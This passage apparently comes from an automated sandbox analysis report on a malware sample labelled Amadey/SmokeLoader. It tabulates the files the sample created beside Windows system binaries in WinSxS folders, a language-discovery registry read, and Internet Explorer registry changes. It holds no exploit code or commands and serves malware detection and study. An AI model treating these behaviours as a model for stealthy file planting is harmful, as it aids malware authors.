| File created | C:\Windows\WinSxS\amd64_microsoft-windows-authentication-logonui_31bf3856ad364e35_10.0.19041.1_none_1b8420121296312d\LogonUI.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-bioenrollment.appxmain_31bf3856ad364e35_10.0.19041.844_none_de5d9fe254d9f8c4\BioEnrollmentHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-settingsynchost_31bf3856ad364e35_10.0.19041.1202_none_fef803c70cc0b37b\r\SettingSyncHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-filehistory-ui_31bf3856ad364e35_10.0.19041.1_none_0423901f2a62a812\FileHistory.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-t..eldebugger-recorder_31bf3856ad364e35_10.0.19041.746_none_4cb1ff2aa122b5dd\r\tttracer.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.19041.1202_none_497a4c9b969ee5eb\wsmprovhost.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\x86_microsoft-windows-ie-ielowutil_31bf3856ad364e35_11.0.19041.1_none_9439f8fec314ad47\ielowutil.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-gpowershell-exe_31bf3856ad364e35_10.0.19041.1_none_ee822d264112a470\powershell_ise.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-mapi_31bf3856ad364e35_10.0.19041.423_none_895925637881788e\f\fixmapi.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-d..x-directxdiagnostic_31bf3856ad364e35_10.0.19041.1_none_e409500831824146\dxdiag.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.19041.1202_none_3fe90cdb6667211e\r\wevtutil.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..onentpackagesupport_31bf3856ad364e35_10.0.19041.1_none_15ad78a57833209d\CompPkgSrv.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..ime-eashared-imepad_31bf3856ad364e35_10.0.19041.1_none_f07d4fae3e8e883f\IMEPADSV.EXE- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-bits-bitsadmin_31bf3856ad364e35_10.0.19041.1_none_0d5748d7e02a5474\bitsadmin.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-dataexchangehost_31bf3856ad364e35_10.0.19041.264_none_c765d8a6c76ec25f\f\DataExchangeHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-rasautodial_31bf3856ad364e35_10.0.19041.546_none_edd345b6c42269da\r\rasautou.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.19041.1266_none_93a0f3defb54e912\f\rdpshell.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.19041.1151_none_2e15548db03a22c8\r\CheckNetIsolation.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_hyperv-compute-containerdiagnosticstool_31bf3856ad364e35_10.0.19041.928_none_6571ff6e96271a64\r\hcsdiag.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_10.0.19041.1266_none_cfec8db821d83671\f\winresume.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..utermanagerlauncher_31bf3856ad364e35_10.0.19041.1_none_4406801793afabed\CompMgmtLauncher.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.19041.1_none_8089599dd595a93d\InputSwitchToastHandler.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_49716c2392052aca\relog.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.19041.1081_none_f28ba6a10743aebc\r\SpeechModelDownload.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.19041.264_none_5b8f61a9b1063622\SpeechModelDownload.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-coresystem-wpr_31bf3856ad364e35_10.0.19041.207_none_4054ef70f69f6ff9\r\wpr.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..agement-coredpussvr_31bf3856ad364e35_10.0.19041.1_none_513ebdc8ffa81e3d\coredpussvr.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-netplwiz-exe_31bf3856ad364e35_10.0.19041.1_none_a347c249afbf6f97\Netplwiz.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\r\printui.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-d..omerfeedbackmanager_31bf3856ad364e35_10.0.19041.844_none_c47fb20821633815\f\imecfmui.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-terminalservices-theme_31bf3856ad364e35_10.0.19041.1_none_962bc7b24e8d9f3a\TSTheme.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.153_none_90dc0b923cd83016\SecHealthUI.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-t..ices-appcompattools_31bf3856ad364e35_10.0.19041.1_none_a9109d150b1bf064\acregl.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.19041.1_none_330dfb2b06b21af6\chcp.com- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-r..ckgroundmediaplayer_31bf3856ad364e35_10.0.19041.1_none_71d70fbd497cca66\Windows.Media.BackgroundPlayback.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..biometrics-trustlet_31bf3856ad364e35_10.0.19041.1_none_fb337fa99fb8bc2f\BioIso.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..nsemanager-shellext_31bf3856ad364e35_10.0.19041.1_none_683b3c51d469e51b\LicenseManagerShellext.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{6B8E5EE0-58CF-11F0-A7F8-7AE4B03588A9} = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1082430718" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31190236" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Bing" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000120c8ad82f5bf4408e10b6f8c826b1a600000000020000000000106600000001000020000000082d8246d93faf674330a8d690fdf8307d26addbdf376794c00bcf76dbe4e304000000000e800000000200002000000072eebb86b760246618b09a8dbbf3807f487d2c9867219aee130a797fbcb52b67100000006f8b16e9c04532efd7721976f8f2e01040000000b8559d26d53255a4a71e7b2fce8e9abbcc1fcfa91eb5790118851b8af55ac239c5b8222b2e829f1ad9aab3ad7e8cfcbb658ca0fb7cea5247ebc3964b076582d5 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31190236" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000120c8ad82f5bf4408e10b6f8c826b1a6000000000200000000001066000000010000200000001d4189afb7466bcd7b49fdc11f4416befc413194cf7b088074deddcfe3db5e19000000000e8000000002000020000000083e5fece4cf13bc27815e8e062d094d205619c240dd5f8fe9417966a79bec881000000041b529b3443a09878b41a37f18b13064400000001015a2745def0e4681fae76b08358cfa4d58db21f44e29807354d2002b124b377323626131fdc083272f9b30d196a877250f03cb5d8f541f01bdcfea3fe99be4 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000120c8ad82f5bf4408e10b6f8c826b1a600000000020000000000106600000001000020000000d68a466fbbefa9c3c6d2723742e1871801336ac8df602f5e1b37a4d9d55c9a1e000000000e80000000020000200000003bbbd99ce226e6ddb1ca1c73569fcd3bb97b6d4bcb8d1d843d3eb2451d2edfa020000000a02ad7f778df8abbee9ebea45601a8a86d10b472c734b2e56f1a0a1cb188523d400000002f8ea128be1896970398ddf94ebe0a9795888eea3bb0cde3b7ca7f804491382405d67179e9a20d972996f6685c1398a4ab238ee9e9553117d9a762a1a5866f91 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d09bee44dcecdb01 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000120c8ad82f5bf4408e10b6f8c826b1a6000000000200000000001066000000010000200000008cb82d808929f3416b8c9d73872e8929ed185f26eabce6573b0723eb9a9f3993000000000e8000000002000020000000bc81db7b03855515ecdcb9d6e70be4d4cdec534ee740d846f51b4ac449c0c98d20000000574cb4374ac9c05940b1a6c92e2bff5d4a9258f03ecfae2fdab0c6cac784f12e40000000d565a077d4cdd3733fe13443a488c12bd28a5648646f7765c6ed43aea3af81c669e820483a67e9c6b62df6a8ad4638cb7c5ae2c5c5b188ed90f6059fb5b9abb7 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\KnownProvidersUpgradeTime = 77f9f6305be1db01 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 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 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1074461819" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 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 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "458395808" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\User Preferences | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\Version = "5" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 77f9f6305be1db01 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IENTSS" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
